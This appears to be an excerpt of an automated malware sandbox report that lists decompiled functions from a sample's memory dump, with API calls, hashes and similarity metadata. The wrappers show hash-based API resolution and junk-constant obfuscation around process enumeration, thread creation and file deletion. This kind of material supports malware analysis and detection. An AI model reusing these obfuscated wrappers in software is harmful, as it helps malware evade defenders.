                                                      0x0022b587
                                                      0x0022b58a
                                                      0x0022b58d
                                                      0x0022b590
                                                      0x0022b593
                                                      0x0022b594
                                                      0x0022b595
                                                      0x0022b59a
                                                      0x0022b5a4
                                                      0x0022b5b8
                                                      0x0022b5c0
                                                      0x0022b5c4
                                                      0x0022b5cb
                                                      0x0022b5d2
                                                      0x0022b5d9
                                                      0x0022b5e6
                                                      0x0022b5fd
                                                      0x0022b604

                                                      APIs
                                                      • CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 0022B5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                                      • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                                      • Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                                      • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002336D3, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E002336D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t23;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				signed int _t34;
				void* _t41;

				_t41 = __edx;
				_t32 = __ecx;
				E0022602B(_t23);
				_v28 = 0x12ca0f;
				asm("stosd");
				asm("stosd");
				_t34 = 0x2d;
				asm("stosd");
				_v8 = 0xdb27;
				_v8 = _v8 >> 9;
				_v8 = _v8 / _t34;
				_v8 = _v8 ^ 0x000020cb;
				_v12 = 0x489;
				_v12 = _v12 | 0x46cddb89;
				_v12 = _v12 ^ 0x46cde771;
				_t30 = E002307A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
				return _t31;
			}













                                                      0x002336df
                                                      0x002336e1
                                                      0x002336e8
                                                      0x002336ed
                                                      0x002336fc
                                                      0x00233701
                                                      0x00233702
                                                      0x00233709
                                                      0x0023370a
                                                      0x00233711
                                                      0x0023371b
                                                      0x00233723
                                                      0x0023372f
                                                      0x00233736
                                                      0x0023373d
                                                      0x0023374a
                                                      0x00233754
                                                      0x0023375c

                                                      APIs
                                                      • ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00233754
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessSession
                                                      • String ID:
                                                      • API String ID: 3779259828-0
                                                      • Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                                      • Instruction ID: 8950e798ceb59e84ea673d3fc825d95103d2deae560040c10a273ffc93ff1ce0
                                                      • Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                                      • Instruction Fuzzy Hash: F5019675A01208FBEB04DBA9DC469DFFF74EF44364F104055E604A7251D7715F148BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00221132, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E00221132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E0022602B(_t27);
				_v12 = 0xe2c5;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 | 0x070d55ff;
				_v12 = _v12 ^ 0x071f7e34;
				_v8 = 0x91c3;
				_v8 = _v8 + 0xffff5023;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x7e1e17b8;
				E002307A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
				return _t33;
			}







                                                      0x00221135
                                                      0x00221136
                                                      0x0022113a
                                                      0x0022113b
                                                      0x0022113e
                                                      0x00221141
                                                      0x00221144
                                                      0x00221147
                                                      0x0022114a
                                                      0x0022114b
                                                      0x0022114e
                                                      0x0022114f
                                                      0x00221150
                                                      0x00221151
                                                      0x00221156
                                                      0x0022116f
                                                      0x00221172
                                                      0x00221179
                                                      0x00221180
                                                      0x00221187
                                                      0x0022118e
                                                      0x00221192
                                                      0x00221195
                                                      0x002211a8
                                                      0x002211ba
                                                      0x002211c0

                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 002211BA
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                                      • Instruction ID: f979beb798bb3cf82720fb2492394f1c7773163b0efac75937ca00d93acb2ec0
                                                      • Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                                      • Instruction Fuzzy Hash: 5801F772902229BBCF15DFE5DD49CDFBFB9EF09254F104188F90962250D2729A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x00239821
                                                      0x00239822
                                                      0x00239825
                                                      0x00239828
                                                      0x0023982a
                                                      0x0023982c
                                                      0x0023982f
                                                      0x00239832
                                                      0x00239835
                                                      0x00239836
                                                      0x00239837
                                                      0x0023983c
                                                      0x00239855
                                                      0x00239858
                                                      0x0023985f
                                                      0x00239866
                                                      0x0023986d
                                                      0x00239874
                                                      0x0023987b
                                                      0x0023988e
                                                      0x0023989b
                                                      0x002398a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                                      • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                                      • Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                                      • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00239AC7, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00239AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				int _t33;
				signed int _t35;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022602B(_t26);
				_v12 = 0x3a37;
				_t35 = 0x5f;
				_v12 = _v12 / _t35;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000271a;
				_v8 = 0x41ad;
				_v8 = _v8 ^ 0xae17da57;
				_v8 = _v8 + 0xffff40f3;
				_v8 = _v8 ^ 0xae16a338;
				E002307A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
				_t33 = Process32NextW(_a12, _a4); // executed
				return _t33;
			}








                                                      0x00239acc
                                                      0x00239acf
                                                      0x00239ad2
                                                      0x00239ad7
                                                      0x00239adf
                                                      0x00239aed
                                                      0x00239af5
                                                      0x00239afd
                                                      0x00239b01
                                                      0x00239b08
                                                      0x00239b0f
                                                      0x00239b16
                                                      0x00239b1d
                                                      0x00239b31
                                                      0x00239b3f
                                                      0x00239b44

                                                      APIs
                                                      • Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00239B3F
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                                      • Instruction ID: 8856c84a7c8f292e5e28539e4a4c9052b83e022692b5ed9d593964a9c1869230
                                                      • Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                                      • Instruction Fuzzy Hash: 1F014BB1910208BFEF04DFA4CC4A8AEBFB5EF44350F108098F509A6291D7B29B609F50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00227663, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00227663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				intOrPtr* _t26;
				void* _t27;

				E0022602B(_t22);
				_v12 = 0xe6d;
				_v12 = _v12 | 0x830368b1;
				_v12 = _v12 ^ 0x83037da7;
				_v8 = 0xe4f2;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xc9e423b1;
				_t26 = E002307A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
				return _t27;
			}








                                                      0x00227678
                                                      0x0022767d
                                                      0x00227687
                                                      0x00227693
                                                      0x0022769a
                                                      0x002276a1
                                                      0x002276a5
                                                      0x002276a9
                                                      0x002276c2
                                                      0x002276d5
                                                      0x002276da

                                                      APIs
                                                      • QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,0022620E,00000000,?,?), ref: 002276D5
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID:
                                                      • API String ID: 3578328331-0
                                                      • Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                                      • Instruction ID: 6162874eb0240c662fbcb690ffd50800457956f9fbc25523f509d7e536b95c77
                                                      • Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                                      • Instruction Fuzzy Hash: 05014B7690020CBFEF059F90CC06AAEBF75EB44700F108188F91426260D2B29B609B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x0023aa3f
                                                      0x0023aa40
                                                      0x0023aa41
                                                      0x0023aa44
                                                      0x0023aa47
                                                      0x0023aa4b
                                                      0x0023aa4c
                                                      0x0023aa51
                                                      0x0023aa5b
                                                      0x0023aa64
                                                      0x0023aa68
                                                      0x0023aa6f
                                                      0x0023aa76
                                                      0x0023aa8d
                                                      0x0023aa90
                                                      0x0023aa9d
                                                      0x0023aaa8
                                                      0x0023aaad

                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                                      • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                                      • Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                                      • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00239A56, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00239A56(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				void* _t29;

				_t29 = __ecx;
				E0022602B(_t18);
				_v12 = 0x9a38;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00004339;
				_v8 = 0x299d;
				_v8 = _v8 + 0xa1ce;
				_v8 = _v8 | 0xc5f89a67;
				_v8 = _v8 + 0x125d;
				_v8 = _v8 ^ 0xc5f8b599;
				_t22 = E002307A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
				return _t23;
			}










                                                      0x00239a5f
                                                      0x00239a63
                                                      0x00239a68
                                                      0x00239a72
                                                      0x00239a7b
                                                      0x00239a82
                                                      0x00239a89
                                                      0x00239a90
                                                      0x00239a97
                                                      0x00239a9e
                                                      0x00239ab7
                                                      0x00239ac0
                                                      0x00239ac6

                                                      APIs
                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 00239AC0
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1721193555-0
                                                      • Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                                      • Instruction ID: c1803f6b018883b58f743beabe4633ad6e2721f76a5aa50bad52841a68c18480
                                                      • Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                                      • Instruction Fuzzy Hash: CEF037B1911218FFEB08DB94E94A8DEBAB8EF41314F108088F40466240E7B55F649BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00225FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E00225FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                                      0x00225fb5
                                                      0x00225fb6
                                                      0x00225fb7
                                                      0x00225fbb
                                                      0x00225fbc
                                                      0x00225fc1
                                                      0x00225fcb
                                                      0x00225fd7
                                                      0x00225fde
                                                      0x00225fe5
                                                      0x00225ffc
                                                      0x00225fff
                                                      0x00226006
                                                      0x0022600d
                                                      0x0022601a
                                                      0x00226025
                                                      0x0022602a

                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                                      • Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
                                                      • Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                                      • Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions